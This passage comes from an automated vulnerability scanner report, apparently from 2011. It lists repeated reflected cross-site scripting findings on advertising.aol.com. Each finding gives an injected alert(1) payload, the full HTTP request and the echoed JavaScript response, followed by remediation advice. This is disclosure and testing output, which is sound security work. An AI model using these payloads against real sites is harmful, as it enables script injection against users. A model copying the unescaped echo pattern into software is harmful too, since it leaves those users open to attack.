<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.php99290"-alert(1)-"21295270dc0?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,a
...[SNIP]...

1.11. http://advertising.aol.com/token/0/3/1519578957/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1519578957/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d892"-alert(1)-"2c2267ee8cd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8d892"-alert(1)-"2c2267ee8cd/0/3/1519578957/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8d892"-alert(1)-"2c2267ee8cd/0/3/1519578957/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.12. http://advertising.aol.com/token/0/3/1871799369/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1871799369/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92a3d"-alert(1)-"387ea09717f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /92a3d"-alert(1)-"387ea09717f/0/3/1871799369/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:51:41 GMT
ETag: "e03442e11aed0ea9e1ad4331f1d0fcc0"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/92a3d"-alert(1)-"387ea09717f/0/3/1871799369/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.13. http://advertising.aol.com/token/0/3/568890758/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/568890758/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ecc"-alert(1)-"f59af658d37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /21ecc"-alert(1)-"f59af658d37/0/3/568890758/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:54 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/21ecc"-alert(1)-"f59af658d37/0/3/568890758/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.14. http://advertising.aol.com/token/1/3/294660798/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/294660798/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c8e1"-alert(1)-"d188184ba9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7c8e1"-alert(1)-"d188184ba9e/1/3/294660798/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:51:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7c8e1"-alert(1)-"d188184ba9e/1/3/294660798/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.15. http://advertising.aol.com/token/1/3/394991681/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/394991681/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ccb4"-alert(1)-"0a1eef0a385 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2ccb4"-alert(1)-"0a1eef0a385/1/3/394991681/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/2ccb4"-alert(1)-"0a1eef0a385/1/3/394991681/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.16. http://advertising.aol.com/token/1/3/952081387/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/952081387/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 125aa"-alert(1)-"41b87e2863c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /125aa"-alert(1)-"41b87e2863c/1/3/952081387/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/125aa"-alert(1)-"41b87e2863c/1/3/952081387/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.17. http://advertising.aol.com/token/2/3/1071185428/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/1071185428/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca3d"-alert(1)-"7d2af4878a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aca3d"-alert(1)-"7d2af4878a3/2/3/1071185428/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:13 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/aca3d"-alert(1)-"7d2af4878a3/2/3/1071185428/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.18. http://advertising.aol.com/token/2/3/434607676/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/434607676/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a006"-alert(1)-"331193e93c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6a006"-alert(1)-"331193e93c0/2/3/434607676/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6a006"-alert(1)-"331193e93c0/2/3/434607676/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.19. http://advertising.aol.com/token/2/3/673766767/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/3/673766767/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb484"-alert(1)-"431fc0a02e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cb484"-alert(1)-"431fc0a02e0/2/3/673766767/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:59 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cb484"-alert(1)-"431fc0a02e0/2/3/673766767/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.20. http://advertising.aol.com/token/3/3/1881533869/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1881533869/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90f43"-alert(1)-"db3b6157138 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /90f43"-alert(1)-"db3b6157138/3/3/1881533869/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/90f43"-alert(1)-"db3b6157138/3/3/1881533869/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.21. http://advertising.aol.com/token/3/3/613602259/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/613602259/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be31"-alert(1)-"ccced9a65eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2be31"-alert(1)-"ccced9a65eb/3/3/613602259/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:51:22 GMT
